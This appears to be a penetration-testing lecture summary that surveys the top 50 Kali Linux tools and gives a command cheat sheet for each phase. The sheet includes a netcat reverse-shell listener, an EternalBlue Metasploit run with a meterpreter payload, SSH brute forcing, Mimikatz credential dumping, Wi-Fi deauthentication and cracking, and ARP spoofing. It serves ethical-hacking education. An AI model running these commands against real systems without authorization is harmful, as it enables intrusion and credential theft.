
Kali Linux Tools Overview - top 50 tools

Jul 14, 2025

Overview

This lecture presents a concise guide to the top 50 Kali Linux tools essential for security professionals, covering their core functionalities, use cases, and best practices for ethical penetration testing.

Organization of Kali Linux Tools

  • Kali Linux includes over 600 security tools grouped by assessment phase: information gathering, vulnerability analysis, exploitation, forensics, password attacks, reverse engineering, and reporting.
  • Proper tool selection supports each phase of a professional penetration test, from reconnaissance to post-exploitation.

Essential Network Analysis & Scanning Tools

  • Nmap: Versatile tool for network discovery, port scanning, version detection, and firewall evasion.
  • Masscan: Extremely fast Internet-scale port scanner.
  • Netcat (nc): Multi-purpose network utility for port scanning, file transfer, and bind/reverse shell listeners.
  • Wireshark: Powerful packet sniffer for deep network protocol analysis.
  • Hping3: Advanced packet crafting and firewall-testing tool.

Web Application Security Tools

  • Burp Suite: Industry-standard for web vulnerability scanning, proxying, and manual testing.
  • OWASP ZAP: Open-source, automated web application security scanner.
  • SQLMap: Automated SQL injection and database takeover tool.
  • Nikto: Comprehensive web server vulnerability scanner.
  • Dirb/Dirbuster: Brute-force tools for discovering hidden web directories and files.

Wireless Security Tools

  • Aircrack-ng: Suite for Wi-Fi monitoring, handshake capture, deauthentication, and WEP/WPA key cracking.
  • Reaver/Bully: Tools for brute-forcing WPS PINs.
  • Wifite: Automates WEP/WPA/WPS wireless attacks.

Exploitation Frameworks & Social Engineering

  • Metasploit: Advanced exploitation, payload generation, and post-exploitation platform.
  • BeEF: Browser-based exploitation framework.
  • SET: Social engineering attacks automation tool.

Password Cracking & Analysis

  • John the Ripper: CPU-focused password cracker with rule-based word mangling and resumable sessions.
  • Hashcat: GPU-accelerated password cracker supporting hundreds of hash modes.
  • Hydra/Medusa: Parallelized online login brute-forcers for many network protocols.

Vulnerability Assessment Tools

  • OpenVAS: Full-featured vulnerability scanner.
  • Lynis: Security auditing for Unix/Linux.
  • Wapiti: Web application vulnerability scanner.

Forensics & Information Gathering

  • Maltego, Recon-ng, theHarvester, DMitry: OSINT, data mining, subdomain and email enumeration.
  • Autopsy/Sleuth Kit: Digital forensic analysis tools.

Reverse Engineering

  • Ghidra, Radare2, GDB (PEDA/GEF/pwndbg): Disassembly, debugging, and binary analysis frameworks.

Exploit Development & Automation

  • MSFVenom: Payload generator/encoder.
  • Searchsploit: Local exploit-db searcher.
  • pattern_create.rb / pattern_offset.rb (Metasploit): Generate a cyclic pattern and find the offset at which it overwrites the saved return address during buffer overflow development.

Network Spoofing & MITM

  • Ettercap, Bettercap, Responder: Tools for man-in-the-middle network attacks and credential capture.

Mobile Security Tools

  • ADB, MobSF, Frida: Android device management, mobile app analysis, and dynamic instrumentation.

Cryptography & Steganography

  • hash-identifier, Steghide, Binwalk: Hash type identification, steganography, and firmware/file-carving analysis.

Post-Exploitation

  • Mimikatz, PowerSploit, Evil-WinRM: Credential extraction, privilege escalation, and remote shell on Windows.

Reporting & Documentation

  • Dradis, Faraday, CherryTree, Pipal: Reporting, collaboration, note-keeping, and password analysis utilities.

Advanced Automation & Integration

  • Combining multiple tools and scripting maximizes assessment coverage and efficiency.
  • Custom tool development with Python or bash supports specialized tasks.

Best Practices & Ethical Use

  • Always obtain written authorization and define the scope before testing.
  • Document activities, protect confidentiality, and avoid system disruption.
  • Choose tools based on the assessment phase and specific needs.

Frequently Asked Questions (Summary)

  • Beginners should start with Nmap, Wireshark, Netcat, Burp Suite, ZAP, Nikto, theHarvester, and John the Ripper.
  • Practice in legal lab environments, using VMs, online platforms, or isolated home labs.
  • Tool selection and usage depends on the assessment phase and specific target characteristics.
  • Avoid scanning without permission, over-aggressive scans, poor documentation, neglecting scope, and relying only on tools.

Key Terms & Definitions

  • Penetration Testing: Authorized simulation of attacks to find security weaknesses.
  • Reconnaissance (Recon): Information gathering phase before attacking.
  • Exploit: Software or commands that take advantage of vulnerabilities.
  • Man-in-the-Middle (MITM): Attack intercepting communications between parties.
  • OSINT: Open-source intelligence; gathering public data for recon.

Action Items / Next Steps

  • Practice foundational tools (Nmap, Wireshark, Burp Suite, theHarvester) in a legal lab.
  • Set up virtual labs with Kali and vulnerable targets (e.g., DVWA, Metasploitable).
  • Review ethical guidelines before performing any assessments.
  • Continue exploring advanced features and integrations for core tools.

Essential Commands by Phase

The commands below cover the tools above, grouped by the phase of a penetration test in which they are typically used. Hosts such as 192.168.1.100 and target.com are placeholders; substitute in-scope targets only.

Reconnaissance & Information Gathering

Nmap

  • nmap -sS -p- 192.168.1.100 - TCP SYN scan of all 65535 ports (raw SYN scans need root)
  • nmap -sV -sC -O 192.168.1.100 - service/version detection, default NSE scripts, OS detection
  • nmap --script vuln 192.168.1.100 - run the vulnerability-detection NSE scripts (noisy; confirm findings manually)

theHarvester

  • theHarvester -d target.com -b all -l 500 - collect emails, subdomains and hosts from all sources, limited to 500 results

Recon-ng

  • recon-ng - start the framework
  • workspaces create target
  • marketplace install recon/domains-hosts/google_site_web - modules are not installed by default in recon-ng v5
  • modules load recon/domains-hosts/google_site_web
  • options set SOURCE target.com
  • run

Scanning & Enumeration

Masscan

  • masscan -p1-65535 192.168.1.0/24 --rate=1000 - fast port sweep of the whole /24 at 1000 packets/s (needs root; raise --rate only when the network can tolerate it)
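As an added example (not part of the original page), the POSIX shell script below shows the tool chaining described under Advanced Automation & Integration applied to the Masscan and Nmap commands above: it parses masscan's grepable (-oG) output into per-host port lists and emits one targeted nmap -sV -sC command per host, so the slow version scan only touches ports masscan already found open. The -oG sample is constructed to look like the output of the masscan command above, and the 192.168.1.x addresses are placeholders.

```shell
#!/bin/sh
# Added example, not from the original page: stage a masscan sweep into a
# port-targeted nmap service scan. The grepable (-oG) sample below is
# constructed to look like "masscan -p1-65535 192.168.1.0/24 --rate=1000 -oG sweep.gnmap".
set -eu

SAMPLE_OG=$(cat <<'EOF'
# Masscan 1.3.2 scan initiated
Host: 192.168.1.100 ()  Ports: 22/open/tcp////
Host: 192.168.1.100 ()  Ports: 443/open/tcp////
Host: 192.168.1.101 ()  Ports: 445/open/tcp////
Host: 192.168.1.100 ()  Ports: 80/open/tcp////
# Masscan done
EOF
)

# Unique hosts that have at least one "Host:" line in the -oG file.
hosts() {  # $1 = -oG file
  awk '$1 == "Host:" { print $2 }' "$1" | sort -u
}

# Open TCP ports for one host as a sorted, comma-separated list (nmap -p syntax).
open_ports() {  # $1 = host, $2 = -oG file
  awk -v h="$1" '$1 == "Host:" && $2 == h {
      for (i = 1; i <= NF; i++)
        if ($i ~ /^[0-9]+\/open\/tcp/) { split($i, f, "/"); print f[1] }
    }' "$2" | sort -n | uniq | paste -s -d ',' -
}

# One targeted nmap command per host. Printed, not executed: review the list,
# confirm every host is in scope, then pipe it into sh.
followup_commands() {  # $1 = -oG file
  hosts "$1" | while IFS= read -r h; do
    ports=$(open_ports "$h" "$1")
    [ -n "$ports" ] || continue
    printf 'nmap -sV -sC -T3 -p %s -oA scan_%s %s\n' "$ports" "$h" "$h"
  done
}

# Demo run on the constructed sample.
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_OG" > "$tmp"
followup_commands "$tmp"
rm -f "$tmp"
```

On a real engagement, replace the sample with the file written by masscan -oG and run `followup_commands sweep.gnmap | sh` once the host list has been checked against the scope; -oA keeps normal, grepable and XML output for the report.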

Netcat

  • nc -nlvp 4444 - listen on port 4444 (reverse shell listener)
  • nc -zvn 192.168.1.100 1-1000 - scan ports 1-1000

Nikto

  • nikto -h http://target.com - web server vulnerability scan

Dirb

  • dirb http://target.com /usr/share/wordlists/dirb/common.txt - directory brute force

Exploitation

Metasploit Framework

  • msfconsole - start the Metasploit console
  • search smb - search for SMB modules
  • use exploit/windows/smb/ms17_010_eternalblue - select the exploit
  • set RHOSTS 192.168.1.100 - set the target IP
  • set PAYLOAD windows/x64/meterpreter/reverse_tcp - set the payload
  • set LHOST <your IP> - reverse_tcp payloads need the address the target will call back to
  • exploit - launch the exploit

SQLMap

  • sqlmap -u "http://target.com/page?id=1" --batch --dbs - detect SQL injection and enumerate databases

Hydra

  • hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 - SSH password brute force (on Kali, rockyou ships as rockyou.txt.gz; gunzip it first, and keep the thread count low against SSH to avoid lockouts)

Post-Exploitation

Mimikatz

  • privilege::debug
  • sekurlsa::logonPasswords - dump Windows credentials from LSASS

PowerSploit (PowerShell)

  • Invoke-Mimikatz -DumpCreds - dump credentials
  • Invoke-AllChecks - privilege escalation checks (from PowerUp, in the PowerSploit Privesc module)

Evil-WinRM

  • evil-winrm -i 192.168.1.100 -u Administrator -p password - connect to a Windows remote shell over WinRM

Wireless Attacks

Aircrack-ng Suite

  • airmon-ng start wlan0 - enable monitor mode (creates wlan0mon)
  • airodump-ng wlan0mon - survey nearby networks and clients
  • airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon - lock onto the target and write capture-01.cap
  • aireplay-ng -0 10 -a <BSSID> wlan0mon - send 10 deauthentication frames so a client reconnects and the handshake is captured
  • aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> capture-01.cap - crack the WPA/WPA2-PSK from the captured handshake

Reaver

  • reaver -i wlan0mon -b <BSSID> -vv - WPS PIN brute force

Network Sniffing & MITM

Wireshark / Tshark

  • wireshark - start GUI packet capture
  • tshark -i eth0 -Y "http.request.method == POST" - filter HTTP POST requests

Ettercap

  • ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100// - ARP-spoof the gateway and the host in text mode. Builds with IPv6 support use four-part targets (MAC/IP/IPv6/PORT), i.e. /192.168.1.1/// and /192.168.1.100///; check the usage output of your build if the target is rejected.

Bettercap

  • bettercap (interactive)
  • net.probe on - network discovery
  • set arp.spoof.targets 192.168.1.100
  • arp.spoof on - ARP spoofing

Password Cracking

John the Ripper

  • john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt - crack passwords with a wordlist
  • john --show hashes.txt - show cracked passwords

Hashcat

  • hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt - dictionary attack against MD5 hashes (-m selects the hash mode)
  • hashcat -m 0 -a 3 hashes.txt ?l?l?l?l?l?l?l?l - mask attack: every 8-character lowercase string
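An added example, not from the original page, that makes the hashcat mode numbers and the -a 0 dictionary attack above concrete: a POSIX shell script that guesses the mode from digest length the way hash-identifier does, hashes each wordlist entry with coreutils md5sum/sha1sum/sha256sum, and reports results in john --show form. The wordlist and hashes.txt contents are constructed for the demo: the first two digests are MD5 of "password123" and SHA1 of "password", the third is an all-zero placeholder that no wordlist will crack.

```shell
#!/bin/sh
# Added example, not from the original page. Reproduces at toy scale what
# "hashcat -m <mode> -a 0 hashes.txt wordlist" followed by "john --show" does.
set -eu

# Constructed inputs: a five-entry wordlist and a hashes.txt with one digest per line.
WORDLIST=$(printf '%s\n' 123456 letmein password qwerty password123)
HASHES=$(printf '%s\n' \
  482c811da5d5b4bc6d497ffa98491e38 \
  5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 \
  "$(printf '%064d' 0)")

# Guess the hashcat mode from digest length (unsalted hex digests only).
# Length alone is ambiguous: NTLM (-m 1000) is also 32 hex chars, which is why
# hash-identifier lists several candidates and you confirm from context.
guess_mode() {  # $1 = hex digest; prints a hashcat -m value or fails
  case "${#1}" in
    32) echo 0 ;;     # MD5
    40) echo 100 ;;   # SHA1
    64) echo 1400 ;;  # SHA2-256
    *)  return 1 ;;
  esac
}

# Hash one candidate with the coreutils tool matching the mode. No trailing
# newline is fed to the hash, matching what hashcat and john compute.
digest() {  # $1 = mode, $2 = candidate plaintext
  case "$1" in
    0)    sum=md5sum ;;
    100)  sum=sha1sum ;;
    1400) sum=sha256sum ;;
    *)    return 1 ;;
  esac
  printf '%s' "$2" | "$sum" | cut -d ' ' -f 1
}

# Dictionary attack (-a 0): hash every wordlist entry and compare with the target.
dict_crack() {  # $1 = hex digest, $2 = wordlist file; prints plaintext or fails
  mode=$(guess_mode "$1") || return 1
  while IFS= read -r cand; do
    if [ "$(digest "$mode" "$cand")" = "$1" ]; then
      printf '%s\n' "$cand"
      return 0
    fi
  done < "$2"
  return 1
}

# Whole-file run in "john --show" style: digest:plaintext, or [not cracked].
crack_file() {  # $1 = hashes file, $2 = wordlist file
  while IFS= read -r h; do
    [ -n "$h" ] || continue
    if pw=$(dict_crack "$h" "$2"); then
      printf '%s:%s\n' "$h" "$pw"
    else
      printf '%s:[not cracked]\n' "$h"
    fi
  done < "$1"
}

# Demo on the constructed inputs.
wl=$(mktemp); hf=$(mktemp)
printf '%s\n' "$WORDLIST" > "$wl"
printf '%s\n' "$HASHES" > "$hf"
crack_file "$hf" "$wl"
rm -f "$wl" "$hf"
```

The script forks a process per candidate, so it is only a teaching aid; the point is that hashcat's -m value is a statement about the algorithm you believe produced the digest, and an uncracked hash is as likely to mean a wrong mode guess as a strong password.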

Reporting & Documentation

Dradis

  • service dradis start - start the Dradis server
  • Access via browser: http://localhost:3000

CherryTree

  • cherrytree - start the note-taking GUI

General Tips for Ethical Hackers

  • Always obtain written authorization before testing.
  • Use verbose and logging options to document your work.
  • Start with passive reconnaissance before active scanning.
  • Use timing options to avoid detection or service disruption (e.g., -T2 or lower in Nmap; -T3 is the default and -T4/-T5 are the aggressive settings).
  • Clean up after testing (remove backdoors, shells, accounts).
